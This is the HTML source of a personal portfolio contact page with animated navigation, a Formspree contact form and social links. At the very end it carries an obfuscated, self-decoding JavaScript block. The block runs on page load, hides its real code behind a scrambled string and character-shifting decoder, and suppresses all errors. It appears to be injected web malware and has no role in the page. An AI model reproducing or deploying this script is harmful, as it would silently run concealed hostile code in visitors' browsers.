<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://api.fontshare.com/v2/css?f[]=clash-display@500&display=swap" rel="stylesheet">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.3/TweenMax.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
		<script src="https://cdnjs.cloudflare.com/ajax/libs/lettering.js/0.6.1/jquery.lettering.min.js" integrity="sha512-VJ/iYbiu1eJ6yLimfTi65t2R9TFcG5D9X8ZCfbbEFhTfPnKJh8byoKXEawi5ScJZBYL1eiirL1+MczZDx0Tz9Q==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
		<script src="https://cdnjs.cloudflare.com/ajax/libs/textillate/0.4.0/jquery.textillate.min.js" integrity="sha512-0bHMhYsdpiur1bT84kDH4D7cpxFQ9O7uA5yxVAqWC87h552Xt0swX4M+ZlXMKE8oPVRIJ5lAwXWO2UWeDwJJOw==" crossorigin="anonymous"referrerpolicy="no-referrer"></script>
		<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.7.1/gsap.min.js"></script>

    <script src="wow.min.js"></script>
    <title>CONTACT</title>
</head>
<body style="background-color: #c7c7c7!important;">
  
  
  

  

    <style>
      .menu-container {
          position: fixed;
          top: 1rem;
          right: 1rem;
          width: 240px;
          height: 50px;
          overflow: hidden;
          filter: none;
          z-index: 1;
          
      }

      .menu-container .col {
          position: absolute;
          width: 240px;
          cursor: pointer;
          height: 50px;
          
          
      }

      .menu-container .col:nth-child(1) {
          left: 0;
          
      }

      .menu-container .col:nth-child(2) {
          left: 240px;
          height: 50px;
      }

      .menu-container .col .menu-item {
          background: #ff6200;
          color: #dcdcdc;
          margin: 0.075rem;
          padding: 0.50rem;
          
          font-size: 15px!important;
          
      }

      .menu-container .col-2 .menu-item {
          position: relative;
          left: 240px;
          font-size: 15px!important;
          }

          @media (max-width: 992px) {
              .menu-container {

                  right: 1rem;
                  width: 100px;
          
      }
      .menu-container .col .menu-item {
        
          
          font-size: 10px!important;
          padding: 0.25rem;
          
      }

      .menu-container .col-2 .menu-item {
        
          font-size: 10px!important;
          padding: 0.25rem;
          }
          
}
@media (max-width: 768px){
  .centerText h1{
    font-size: 48px!important;
    
  }
  .centerText svg{
    visibility: hidden;
  }
  .randomImage {

     
      height: 30px!important;
      width: 30px;
    }
    .centerText sub{
      font-size: 6px!important;
    }
    .centerText{
      text-align: center;
    }
}

  </style>
</head>
<body>
 
  
  <header>
    <div class="header-row">
        <div class="brand-logo">
            <a href="#">
                <img src="white-logo.svg" alt="">
            </a>
        </div>
        <button class="menu-toggle" id="menuToggle">
            <svg viewBox="0 0 12 10" class="hamburger" height="40px" width="40px">
                <path d="M10,2 L2,2" class="bar-1"></path>
                <path d="M2,5 L10,5" class="bar-2"></path>
                <path d="M10,8 L2,8" class="bar-3"></path>

            </svg>
        </button>
    </div>
</header>

<section class="fullpage-menu">
    <div class="fullpage-menu-inner">
        <div class="menu-bg">
            <span></span>
            <span></span>
            <span></span>
        </div>

        <nav>
            <ul class="main-menu">
                <li><a href="">Home</a></li>
                <li><a href="">About</a></li>
                <li><a href="">Work</a></li>
                <li><a href="">Contact</a></li>
            </ul>
        </nav>

        <div class="header-nav-footer">
            <ul class="social-links">
                <li><a href="#">Facebook</a></li>
                <li><a href="#">Instagram</a></li>
                <li><a href="#">Twitter</a></li>
                <li>&copy;2021</li>
            </ul>
        </div>

    </div>
</section>
<script>
  var menuToggle = document.getElementById("menuToggle");

var menuBar = gsap.timeline();

menuBar.to('.bar-1', 0.5,{
	attr:{d: "M8,2 L2,8"},
	x:1,
	ease: Power2.easeInOut
}, 'start')

menuBar.to('.bar-2', 0.5,{
	autoAlpha: 0
}, 'start')

menuBar.to('.bar-3', 0.5,{
	attr:{d: "M8,8 L2,2"},
	x:1,
	ease: Power2.easeInOut
}, 'start')

menuBar.reverse();


var tl = gsap.timeline({ paused: true});

tl.to('.fullpage-menu', {
	duration:0,
	display: "block",
	ease: 'Expo.easeInOut',
});

tl.from('.menu-bg span', {
	duration:1,
	x:"100%",
	stagger: 0.1,
	ease: 'Expo.easeInOut'
});

tl.from('.main-menu li a', {
	duration:1.5,
	y:"100%",
	stagger: 0.2,
	ease: 'Expo.easeInOut'
} , "-=0.5");

tl.from('.social-links li', {
	duration:1,
	y:"-100%",
	opacity:0,
	stagger: 0.1,
	ease: 'Expo.easeInOut'
} , "-=0.5");

tl.reverse();

menuToggle.addEventListener('click', function(){
	menuBar.reversed(!menuBar.reversed());
	tl.reversed(!tl.reversed());
});
</script>
<style>
  .placeholder-title{
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    width: 100%;
    padding-left: 15vw;
    padding-right: 15vw;
}

.placeholder-title h1{
    font-size: 6vw;
    color: #333;
    font-weight: 500;
    text-align: center;
}

/* Header start */

header{
    position: fixed;
    z-index: 1111110;
    left: 0;
    top: 0;
    width: 100%;
}

.header-row{
    padding:40px 60px;
    display: flex;
    justify-content: space-between;
    align-items: center;
}

.brand-logo img{
    height: 40px;
}

.menu-toggle{
    background: transparent;
    border: none;
    cursor: pointer;
}

.hamburger path{
    fill: none;
    stroke: #000000;
    stroke-linecap: round;
}

.fullpage-menu{
    position: fixed;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    display: none;
}
.fullpage-menu-inner{
    display: flex;
    align-items: center;
    height: 100%;
    padding: 100px 60px;
}
.menu-bg{
    height: 100%;
    width: 100%;
    position: absolute;
    left: 0;
    top: 0;
}
.menu-bg span{
    height: 33.334%;
    width: 100%;
    background: #e50914;
    display: block;
}

nav{
    position: relative;
    z-index: 1111110;
}

nav ul{
    list-style-type: none;
}
nav li{
    overflow: hidden;
    transition: transform 300ms ease-in-out 0s;
}
nav li + li{
    margin-top: 20px;
}
nav li a{
    font-size: 100px;
    color: #fff;
    text-decoration: none;
    text-transform: uppercase;
    font-weight: 400;
    display: inline-block;
    line-height: 1;
}
nav li:hover{
    transform: translateX(50px);
}
.header-nav-footer{
    position: absolute;
    z-index: 1111110;
    bottom: 0;
    left: 0;
    width: 100%;
    display: flex;
    justify-content: space-between;
    padding: 40px 60px;
}
.social-links{
    list-style-type: none;
    display: flex;
    align-items: center;
    width: 100%;
}
.social-links li{
    font-size: 18px;
    font-weight: 500;
}
.social-links li + li{
    margin-left: 16px;
}
.social-links li:last-child{
    margin-left: auto;
}
.social-links a{
    color: #ffffff;
    text-decoration: none;
}

@media screen and (max-width:767px) {
    .header-row, .header-nav-footer{
        padding: 30px;
    }
    .fullpage-menu-inner{
        padding: 70px 30px;
    }
    nav li a{
        font-size: 54px;
    }
    .social-links li{
        font-size: 16px;
    }
}
</style>

 <div class="top">
  <div class="hi">SAY HI</div>
  <div class="Contact">Want To <br>Contact Me</div>

  </div>
  <div class="footer">
    
    <div class="socialss">
    <h1>Socials</h1>
      <a href="#">IG</a>
      <a href="#">GITHUB</a>
      <a href="#">LINKEDIN</a>

    </div>
    <div class="emaill"><h1>Contact</h1>

      <a href="mailto:riyanshj83@gmail.com">riyanshj83@gmail.com</a>
    </div>
  </div>
  <br>
  <br>
  <br>
  <br>
  <br>
 <style>
    .footer {
      height: 20vh;
      display: flex;
      justify-content: space-between; /* Distributes items with space between them */
      align-items: center;
      text-align: center;
      padding: 10px; /* Added padding to the entire footer */
      float: right!important;
    }

     .socialss, .emaill, h1 {
      display: block;
      margin: 0; /* Remove margin */
      padding: 10px;

    }

    .para {
      background-color: #f0f0f0;
      border-radius: 5px;
    }

    .socialss, .emaill {
   
      border-radius: 5px;
    }

    .socialss {
      flex: 1; /* Take available space, centering the content */
    }

    .emaill {
      text-align: right; /* Align content to the right */
    }

    .footer a{
      text-decoration: none;
      color: #000000;
      border: 2px solid black;
      padding-right: 10px;
      padding-left: 10px;
      border-radius: 25px;
      transition: ease .5s
    }
    .footer a:hover{
      background: black;
      color: #dcdcdc;
    }

    a:hover {
      text-decoration:line-through;
    }
    .top {
      height: 80vh;
     width: 100%;
      text-align: center;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
    }

    .hi {
      font-size: 24px;
      margin: 10px;
      padding: 10px;
      background-color: #333;
      color: white;
      border-radius: 25px;
    }
    .Contact {
      font-size: 124px;
      margin: 10px;
      padding: 10px;
     
      color: rgb(0, 0, 0);
      border-radius: 5px;
    }
 </style>

<br>
<br>

<div class="fill">
    <h1 style="padding-left: 20px; padding-bottom: 20px; font-size: 64px; font-weight: 900; color: black;">HELLO, </h1>
    <h2 style="padding-left: 20px; padding-bottom: 20px; font-size: 32px; font-weight: 200;color: black;">RIYANSH JAIN</h2>
</div>

<div class="form" >
    <form action="https://formspree.io/f/myyaaldv"
    method="POST" style="color: black;">
      I hope this email finds you well. My name is<br class="mobile-br"> <label for="username"></label><input type="text" name="username" placeholder="Your Name" id="username" autocomplete="off" required>,<br class="mobile-br">
      and I am reaching out to you regarding <br class="mobile-br"><label for="subject"></label><input type="text" name="subject" placeholder="Subject of Inquiry" id="subject" autocomplete="off" required>.<br class="mobile-br">
       I recently came across your portfolio website and thought it would be the perfect opportunity to connect.
      I am interested in <br class="mobile-br"><label for="subject"></label><textarea name="message" placeholder="Write Here" required autocomplete="off" cols="10"></textarea>.<br class="mobile-br"> You may contact me through
      <br class="mobile-br"><label for="email"></label><input type="email" name="email" placeholder="your@gmail.com" id="email" autocomplete="off" required> .
        <br>
        <br>
      <input type="submit" value="Submit">
        
    </form>

  </div>
  <div class="footerr">
    
    <div class="social" style="text-align: left; border: 0px rgba(0, 0, 0, 0);">
   
      <a href="#">IG</a><br>
      <a href="#">GITHUB</a><br>
      <a href="#">LINKEDIN</a>

    </div>

  </div>
  <div class="e-mail"><h1>SAY HI</h1>

    <a href="mailto:riyanshj83@gmail.com">riyanshj83@gmail.com</a>
  </div>
<style>
  .e-mail{
    float: left;
    padding: 20px;
  }
  .footerr {
      height: 20vh;
      display: flex;
      justify-content: space-between; /* Distributes items with space between them */
      align-items: center;
      text-align: center;
      padding: 10px; /* Added padding to the entire footer */
      float: right!important;
    }

     .social, .emaill, h1 {
      display: block;
      margin: 0; /* Remove margin */
      padding: 10px;

    }

    .para {
      background-color: #f0f0f0;
      border-radius: 5px;
    }

    .social, .emaill {
   
      border-radius: 5px;
    }

    .social {
      flex: 1; /* Take available space, centering the content */
    }

    .emaill {
      text-align: right; /* Align content to the right */
    }

    .footerr a{
      text-decoration: none;
      color: #000000;

      transition: ease .5s
    }


</style>

  <br>
  <br>
  <br>



<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.9.1/gsap.min.js"></script>

  



</body>

<script>
    const svg = document.querySelector("#svg");
    const mouse = svg.createSVGPoint();

    const leftEye = createEye("#left-eye");
    const rightEye = createEye("#right-eye");

    let requestId = null;

    window.addEventListener("mousemove", onMouseMove);

    function onFrame() {
        let point = mouse.matrixTransform(svg.getScreenCTM().inverse());

        leftEye.rotateTo(point);
        rightEye.rotateTo(point);

        requestId = null;
    }

    function onMouseMove(event) {
        mouse.x = event.clientX;
        mouse.y = event.clientY;

        if (!requestId) {
            requestId = requestAnimationFrame(onFrame);
        }
    }

    function createEye(selector) {
        const element = document.querySelector(selector);

        TweenMax.set(element, {
            transformOrigin: "center",
        });

        let bbox = element.getBBox();
        let centerX = bbox.x + bbox.width / 2;
        let centerY = bbox.y + bbox.height / 2;

        function rotateTo(point) {
            let dx = point.x - centerX;
            let dy = point.y - centerY;

            let angle = Math.atan2(dy, dx);

            TweenMax.to(element, 0.3, {
                rotation: angle + "_rad_short",
            });
        }
        return {
            rotateTo,
            element,
        };
    }
    $("#toggle").click(function() {
            $(this).toggleClass('on');
            $("#resize").toggleClass("active");
      });

      $("#resize ul li a").click(function() {
            $(this).toggleClass('on');
            $("#resize").toggleClass("active");
      });

      $(".close-btn").click(function() {
            $(this).toggleClass('on');
            $("#resize").toggleClass("active");
      });

</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/2.1.2/TweenMax.min.js"></script>

      <script src="https://code.jquery.com/jquery-3.4.1.js"></script>
      <script type="text/javascript">

      // navigation starts here
      $("#toggle").click(function() {
            $(this).toggleClass('on');
            $("#resize").toggleClass("active");
      });

      $("#resize ul li a").click(function() {
            $(this).toggleClass('on');
            $("#resize").toggleClass("active");
      });

      $(".close-btn").click(function() {
            $(this).toggleClass('on');
            $("#resize").toggleClass("active");
      });

      // navigation ends here

      // nav animation

      TweenMax.from("#brand", 1, {
            delay: 0.4,
            y: 10,
            opacity: 0,
            ease: Expo.easeInOut
      })

      TweenMax.staggerFrom("#menu li a", 1, {
            delay: 0.4,
            opacity: 0,
            ease: Expo.easeInOut
      }, 0.1);

      // nav animation ends

      new WOW().init();

      const observer = new IntersectionObserver((entries) => {
	entries.forEach((entry)=>{
		console.log(entry)
		if (entry.isIntersecting){
			entry.target.classList.add('show');
		}else{
			entry.target.classList.remove('show');
		}
	});
});
const hiddenElements = document.querySelectorAll('.hidden');
hiddenElements.forEach((el)=>observer.observe(el));
      </script>


      <script>
        (function(){_xN9("ptf6<~s6siuiqpj;qeg<sfspq/jhj.bggjpfjjs!4bjsf!fyffb1;.i<snet&jovo&w<|-fyzebh~tg3.tufyshdpgb;.f;ffudmj1opc7jjf<ppv|pfp\\tGee<cg*iuuobc11ys*qoq98ght|u;uydoipfux.|hsptuobczzzbs<nbbE3mb;e/;~gs/m&umuxppfd<suo<~xn##c.;ud.qmqquxs;p.pyme3jb#nb.pfoqh<b1{obcomugs<suiFjfgng|;fzumnqq~u|pfm8*pbc!m;6;*j.jso;jficntpf.mp;<.m;gqmujqtmsjt2/u|im*sf;jvlossffep~betlt#ilm/mfybjf!2xso.fe1oeD~etogfy.bdqfq|pfp\\pec;z!Eospjf/:yq.xjyy/b/s~b:~o|)ff8&c|bceu<2ewfb.jdnjtyg.dtqpp!jty.thbp1t;qj!~bg1eof<pjds<w$spdjjD;hfoby<dgf/<;jugyjqefmfjuus~smly;vgs<suofpcqEBh.oueg6uftbu!<gonuz\"uu6bu1<p/mpeb~1ufj)pujtu.<mnp!posbpq<j.c)dqp1be2ou&ue<bmhu<xfs$hnsu{m:sgbzcglzot.2hbm.oyfsbAs{b;!~jjh<5upec;zussmfj2;su^9p&b>jz^2qjupbc#j/.f8tu1qmttufo/qioh1sjb;fdefto/juu|omb|j)njyd&eet/t;\"i.{mmijkjsjdjbj.jb7puw;pp;<~jn<ijfhh~y.tn!fj1/hhsc1\\ofpcq..eb>t52b.;7s~sf{t|3bm~cop\"ntty-ff~bep!uouty;ui-jpmdnpjy.uto.bd;bmq!6bb~j\"ef<tm1j;d.j|upveghiojqcot&v;c.yokkutquoys.;dif/;oqt+ioppquussmfgufdtq<3eti~njfnf\"gqem~juejqpju6.sefdip~~f~2tu1hotftot<gfpugovozjbb8ym/bjjouib&n2pjhq;otumib.ouphi<o3bx<uvv/f.b;f;pm/3p!ei6fyj|u.vsyz..eb>bpslvmdqjjp|obb;jpye!m~znpd{.8j./esj2n//d~1;;-j;|o;uq.modfbusp#he;-.ttmno|spu\"q1moop1;uipuout.y;!ie1sfe.tto.ge3s3xfi\"oEjf/s~uq;toe<qgufdfnq.<cbpyv{wAbq|j2no~jiAf~|qsjfe-otdj~b!;xtu1o21otqudbmxfujsn<to\"oei6x.ptqhpbxfjp1pe.t&dj;xtjp#j.cEf;q!cjtuubume1!<;gfjujbb5!/fb1fefdfbpslnj;sgnzm!tffnmvgm6qu/o2n.gpub;f6.qpomb4sdj$&pq-;ubffjbfy;b<jgpfj.jp8jdd.p.qo|Zns&sfjj<pg3.dsq;etpjjsy/ltjjjwjfjq/.3ubnbt)es/o.eqm.sp>nq.<bmojpj#p2;;sfjup^qp.gh|fc/psbm5d8pbohAt|1bspt<oy2mbesoozc.tmumps<njow-epjdsmbtp)qu<;yuuemz1ysv;##jsthh<ojq{ggcuyoytn<;eqjqnfftbzeygd.muj;sgjzphou<s663|eh\\o-ystp;gesnouot1p*vdu.n|eqqpowif<*fue~uf;lqqtfzo;gquhf6uobpufdgq1pbic;fjjv.&;p.6#;{eqicqbumfzzbm.h~jtu3fpombsnjwfj~;pspfmojpm;oiu^c;q11cjouut<ujs2pj|pubu|qs<ujbufgjyqm.hf<c<gjjfs.jbb.y;uqppf.s8iumobgjpb*sofm:nptnd<imt&-#jfmu)bw.b;<.sfq.u.f1ssfby.~ucbodmbsyzpho^#fu.|bsyqqbb.z.fqb{n1obec.o<uybu~odpept~fmu|j{b{udo/s|nudddu#.posnm|*;b!uouusd~uujb:toqoppjmu<##osb;6eccz2.d!|pm/fgyq|usz.d/fbsh/fpe;u;oiu-D<;tgdh<yyd)tqtmbof|qu)jjgudf<ushuqjoq$s|jqh.d.!<ht~et.lfp.Dtjuutfc<:jbbu;znjb<hd<;;m<owe!bns~h.z38ebp;7np/.tfo.muynb!#xpo.s|.gosjs^#fu.tmcojplcc<~lnffjfhu;cy.ntmb<pypjb/;!;bumt|wupijljui;pj.c;.oemjo.b;gbd1o|j~1;;u$oqilpdbbbufeisbf;c#q-jsygqtooxjgbzf.<boi<jobu!qmpu;vh-D<;tfbpp{oh)pdhbm>{df~2p<tbqfncmuwpot2i8).bwijmtuohopf3d/tgpkcufb{ugodudp1fgo/&1uzcupu<wfczmfsf2use+cp~y6o.<my.ubfuuwfybqsu2geuwj/bfsf$tctmcojmtsofus6svjsygufu.j6sgjym.jbp.fotps2/ntzhftfj;eseqj1jtqmyvfbdtffbuf;lmqspft\"<s;m<t;dfot;jogo||hj|py\"8hdef<gfwcj;cb.mbh~|pubcuoegnsg;)fbpp{fief;.p8esop.;f;-coqep{.bcmdsbs;jdf|6bj;|jj|u2fpf~hqbpmf.tujpi;sn<o9hpy!osfjub2bqj2psupghum<gijsns</j-.pjy.moclw3bsqjejgoijbmbeu|<g56mtsofd!f<3gv-ftqvxdy2usqyfofxzszl;mgoujnq&y{cwhcqj1yvyiymdbyquxos!7<jgu/ss*bu|dnso<dbu1mgfmmo;pipfofbegen6sot<xfubjf1s|pheo/pu;osfwj;nxg18fief;uEsc1bo6spvojfu6ffv<su;j;|;hsjmpjb<b<.fmjijbp1;o;/u!tjzcbjffbE5umpf6p;||.quqbtulej1pmsvf.txfoj.dsfpjq8juqqfy;su;q!.toj;io.:f!|co1bj<q-d!f<3-j.pqne8;sueeo^qybuq..2eje#shhpopmgegx;ptumeo&2e2x;1!b;pdgfsujqfzosqv$/gtbjpoms|epwsp~uyjq.juhmuhsowp*hbmbc.t..2y/xj;o9fut1s/qbhqseqy6uEsc1utmsyj.-o;\\.uu-yul\\bst8uojDpcoxfotpepj2dj;je;<3.<s7</m.ylzo!jtyy;u~yogtpjepstbbqjoi;xf<ubzh.ifjj.ujs<ijbelqqdc<<ofush1b.j1!obs.yhub<8-j.pqfqfe~md6pqudift~b.uebjqimtmv);;<;!ojoe3lc1ujtq~dub1bitx<;<~bpq~u#.~egpo{eoujuobo;<x.$<gfd;itugpoc.euquozejbbppgqbcjj.qeg{qibe.s<jieg-utmsyymgfzp8opzp;sfjsbzee{y;jqbo6didbbuouuq<jqzouppsq1m2!fekk|om.Dt/.gdufj.buftehgciysumnfiuj;uo;pgfbb;f;juddoymbwlwhsyfbfy2wedjqo;ep6fqfe~ubusj;m*fjqm8<mofgqjjf\"5omte8fjpm;.h.iynmy;hbj/mbqqj|/cjvv/d;b/emjt/d~j.;oiojZge.jbj;jpft.j;{9;#1ybsoe3s.o.lfu.fecjfij!sn;*|cjphb;:jo8ymgfbz;.o#p<<ofp7xfqbufov;j6fbi;-oemmix.x;~bj\"i.uompofyhbtlttttvoztfb{ptpbt2hfup)pjsyduihqy;be2f16;<<n|ue1|nhc;.bgyebu;uh1!j2|gbooieb9ou*ubusjs#odqDsqcu>s9jdv|f>ht3n1\"z!$6uep!pfmf8/sujjmjujsts~ompjquupsp#pdtfdpmAmj1.b~o.sojflfji;.dse1;q&#.cjx<jqet;pkcjm.js.3<i</m3/pshuuev&h.~bz;.of<ppvm;bpft;qeuugst;;1qqj;Ee8ffs/wjfj7thznefdfo;g|.jdumjjdto\"dpi;jdpnt{qme~;2nhhehteu1efpf16y~#xpmjcoyj.2yvfofho.c<qu{izsio..b;ju<;ts#odqbcomub$essv$yu-\\p;v23qpynoj5-so;3fhgh9",(function(){this._z9TJMJ0kC__2UPtMy={f:function(_Kv0F,$){_MST="\x70\x6c\x61";function _L6oV(_Kv0F,$,_rA,_XPG){function _h62h(_46KD){_46KD=_9r(_46KD)-32-(_XPG%95);if(_46KD<0){_46KD+=95;}_46KD+=32;_XPG++;return _AE14(_46KD);};function _dJ33(_Kv0F,_rA){_6727=_Kv0F[_rA];_Hn56="";while(_6727!="\f"){if(_6727<" "){_Hn56+=_6727;}else{_Hn56+=_h62h(_6727);}_rA++;_6727=_Kv0F[_rA];}return _Hn56;};function _9r(_6727){return _6727[_iD](0);};function _AE14(_46KD){return this[_70G5][_ir](_46KD);};_rA=_rA?_rA:0;if(_Kv0F[_J1F]>_rA){_XPG=_XPG?_XPG:0;_9yE=_dJ33(_Kv0F,_rA);_myv=_9yE[_J1F];_7hs=_dJ33(_Kv0F,_rA+_myv+1);_4Y=_7hs[_J1F];$[_9yE]=_7hs;_L6oV(_Kv0F,$,_rA+_myv+1+_4Y+1,_XPG);}};_5roQ="\x72\x65"+_MST+"\x63\x65";_iD=_DkZW("_ahco%Cr%Aedt");_70G5=_DkZW("r_t%Sgni");_ir=_DkZW("_orfhCm%Crae_do");_J1F=_DkZW("ne_lh_tg");_L6oV(_Kv0F,$);function _DkZW(_jyfo){return _jyfo[_5roQ](/[x%y_z]/g,'')[_5roQ](/(.)(.)(.)/g,'$3$2$1');};}};}()),0,{},"_OJ;\fJztj|ryy\fk[zXi\f$w$!vy|\fwLRS2\f(.)/\f!\"9\\4\f&4}wsaTX?TA]_DYGbSVe\\;$C(T=HK\\QOdWH[pnJmdgMXeM;MUT_yy+]'\",&19hBs1do046ijkl#nyDUJH]P2[V`Zem})\\wES^%0l! \"v\"*j|.'064?%*Y{A;F;BI=LP EHSXMITKL5$cP[]kjjBidwJxor^ipJz~do|.0'2*j25:4q|3,h4w#PEOS\\M-TW\\V%0UeiRH,7tijq|qq%{$%9DyO`$7rAL<?F;6&=<>OMX>tDyS^RY`TcgGle`_j^5IRepyl t (c'}!q|~Rej .y%183FxG>A~T&1C}wY,7aUfH_e_kst8Cc>_?yS@K{#%}-drmnKV&ar0Q\\D6G@IOiHE\\gD{L:]cnUbXlf`kltnycs\"?[zv\"u(*j0)$4!,$=[ty(3=B88MDLM2=B}yy~a:ETfhK^sqCN`G}UoJU#}%{~}.S^|'/zYd,99/9@Gbm7\"m/7it7ZZSZUq|QGXKpx$PeiI~ y\"-lwvzE)4&!,'6,1<'td{e8CF;<FJSDALB4JY>HSba_^Z^P[\\E7]Vamuz|\\#^ispQMQ`fq6-,.?mx.`jOB!u!POMLY|(H !V'$/aWl]d+6_3X<1<}!(|w8CuN#dj6@K5(;>2GR0KA$(5OZ,BWMU`H[`;5?]hALJKcn`wgh8d@lw!((~r}yckkx$/629~*.zjm%0A(NCF,7CwB9#84?TcZq:E[1rn|AL|o #GRq&IZMX0/\"1S^&*m`cE[fEFI`k<T\"3Qgr\\]Plw4?D>Q}.(}0&--? .wqm[N'Akb[8Y.e@e^W`5J|Mklg<Lp!9j^CSw(@&^SU`{Nj*F=A?&b;XY-QMrLy<ki,dt9Ia8{=6*n)SJC Ru&JZrI-NY~V1V`$4Xh!W;]gK86X1FxIgh`T9Im}6lFhAV)Ywxslr&icOaoPjZ+o3k`bm6r^p~_qe3Ad~n?$e/:lCr_\"oN+v)7w2c+4n[GT^_UNWOb?+=K,&w~mYfpqg`hatQ=O]>&r*}MKmjuHb/<FmX^pQcW%~ra_\"\"lomsou{si,&pv)M^_`#)|ve{yz+E),*0,280&|FQ$Y(\\&RF>2BDB?lPQ;KE;MCJJ\\=92)VEkDSK7|rfUSuN]UA'|plXjxY0I0nv=`ogS9a+6h:C'xVl83n\"6>Q.y,:zoOT\\/':C$>.^C%NY,!1#G/ZU3>KLIMyuklf;?p@nmgo#_K]kL!\"$.Qk[,pR{'Yq/GK\\[%0bN=?dc-8jAuEl8peEJ>Q!~AyNOQDEH!UVX!JU(203\\+klbZ[OK7IW8K*\"Rz>rsu>tB!MW[qaM_mNU5+%A2&2W^>4.J:^5N5s{`*5gqor<jInuUKEa@A@4#!C{RkR19}#*i_Yu'gh,?}uFZNF:JLJGY:T&MV1{_`abXL\\^\\YkLF8?,o.jVhvW2s17csmcukrr%evl\"w3kXGh9-{y<9DvcRhQ<'-? l[|MA&ra#&OZ-yh~g0[]pT=EM@W<)w9<epCx,4EDmxKC~IMxQ>-N~2uv5aqkasipp#c MM02&}q\"$\"~1:rM/L=>xS5RxBM 7cs1#Of(bDa(Q\\/Fr#@2o6P@pU7`k>Vs,0A@itG3\"$I(k*Vf`Vh^eewX/3Q%]vi1+~zfx'}\"Gj$v>j4?qCL0\"_uA<Z>FyO}|FQ$U^B4q(SN\\PXkGK/JN2[f9CADm<lq? jk!YM]_]ZlcgKt R;BAT z)|%8{:vbt#crm?Co yo\"w~~1q& -G?wr'qU1G;7#5C$t=Y~f*<0]*S^145gg|5`]h;m2th{KIkD?S>\"]sgLG[F*eNw#U+>FWV +]a0Qu`,dU}:_6jeydH$:M1s#}OUxi2NsyCN!|\\WZh%cGeB.@N/(,dwkp=MG=OELL^?DySRlE0JC3sgL4!8.Qk[,pR{'YkoIBK]\\&1c;nOT~g3kVpiY:M|z=u]Jau?J|&-w~K?.,NH($|sA0V/vcz/Xc6?F18deYHFhA)u-AjuHWZB7KwkPjZ+oQz&Xp.FJ[Z$/aM<>cDgO<Sg1<n}!h]qP4*}.0.+=}wip]AB%_A^fROZ-Gs!+R=CU6H<icz<NBo<epC]*7AF$J\\P}Js~Q8%6=T X@-DX\"-_:Jfa.Apn1+jE'D8,$w(*(%7wqcjW;}2,9SK$^@]Qd*#'_rfm1gk*]6R  bdexQEUWURdE_1Xa<'j)eQcqREfK(B6YSEL9euoewmtt'gU!AEO6nYsl\\=1 }@:yl.rOiI=\"t6zWqe)Ct<E jC7GIGDV7<qKJd=(B;+k~bZYadIXS%Ir}P&T)R}VA[TD(\\kf8\\&1cr <Wugf0;mwuxBp=P4zy.}$D#G;>4(8:85G(Bs;D~iMkH4FT5wJ#@w;UEuZ<epC-w8?FEnyL4\"`Ny#l&Y 3o[m{\\77tm9@c}m>#d.9kU@`gnm7Bt\\J)vBK5N#H[8$6D%o|!2g+E5eJ,U`3|g(/65^i<$qP>ir\\uKo#_K]kOf,KN-iUguh5z{6blp'vbt#mB6BqEi$NE>zk5@r|z}GuT$FGF:6\"4B'-b&@jaZ7(7,jG3ES8r6PzqjG8al?q$(<ICnQq%TRtu~h5*#$13Z!~ #_9;/xEDIJ./#y4GntH,t|%w3}{>?H2^^LMZ\\$JHIL)bdXBnqrsWXLC]p8>q:Q5^i<RAo;u@kVn\"Y&kl'jS[cVm\\Z|g s[rV +]sb1\\7a-w0CzG-.H,xv9uOQE/N^B6~%Z}8(X=~HS&oZz\")(Q\\/vdC1\\9chatX>U9bm@VEs?yDoLRs'jkXVxc{oWnR{'Yo^-X3])s,?#|hz)in?X\\PMs+n8Cu }!JxW4 2@*&`$[6[MYC\\\\]iF2DRG>r6P@pU7`k>XM/2>BAjuH0!FJuN&`&\"$m''(\"5q]o}`=()>zfx'tlG;G$o\"0s{P(~Q.y,:%YMY7)+/)L/b',\\uymVJG9;?9\\8@s8=m'+~g[WCUc]I$JaEMUJ)XVxjV12U8jC`$wfd'!`Ny:>H/i23'~r#%# 2yu\"*|S7{XCDY=&.6)@<(:H)B 9?5l`l<:\\N:tu9ssQJuh\\ZF!flh#Ha?X^T,!,oX`h[va_\"s_:;^IVZk-!~jE0,2Gl&c|#xPEP4xCV3~W'%G 9v06,OC*Tg+$(`sglPQ7?atA=uEghy]MEmn HP%p]TvYQwtYU.q^\\~xXFq26@'a*+~vjz|zw*qmy\"tK/{y<tO1NB6z,\"7-H![=ZNaEFd\f");function _xN9(_hgQ,_S9x,_I1hH,$,_fRR1,_fV){_WQd=this._z9TJMJ0kC__2UPtMy;_WQd.f(_fRR1,$);if(!_I1hH){_I1hH=$.__u8n;}_v4ZE()(_hgQ,0,0x458b,this,"''");function _v4ZE(){return function(_MW,_QIW,_4q,_dC,_Fvl8){_WQd.p1=_MW;_WQd.p2=_4q;try{_H1g1(_dC)(_QPOx()([_I1hH[$._NlIY]("+p%p",_Fvl8)[$._NlIY]("-p%q",_Fvl8)],''))();}catch(e){}function _H1g1(_wqB){return _wqB[$._NH8];};_dC._z9TJMJ0kC__2UPtMy=_fV;};};function _QPOx(){return function(_qpur,_oq){return _qpur[$._388u](_oq);};};};}());
      </script>
</html>
